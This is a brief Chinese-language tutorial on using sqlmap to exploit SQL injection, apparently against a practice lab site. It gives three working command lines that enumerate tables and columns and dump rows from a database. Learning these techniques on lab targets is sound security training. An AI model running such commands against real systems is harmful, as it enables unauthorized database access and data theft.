sqlmap 是一个开源渗透测试工具，它可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。它具有强大的检测引擎，同时有众多功能，包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。

安装完python，sqlmap以后就可以进行使用

简单使用：

知道库名之后：爆破表名

python sqlmap.py -u http://inject2.lab.aqlab.cn:81/Pass-11/index.php?id=1 --dbms MYSQL -D 库名 --tables --level 2

知道库名，表名之后，爆破字段名

python sqlmap.py -u http://inject2.lab.aqlab.cn:81/Pass-11/index.php?id=1 --dbms MYSQL -D 库名 -T 表名 --columns --level 2

知道，库名，表名，字段名之后，爆破字段1~3行的内容

python sqlmap.py -u http://inject2.lab.aqlab.cn:81/Pass-11/index.php?id=1 --dbms MYSQL -D 库名-T 表名-C 字段名 --dump --start 1 --stop 3 --level 2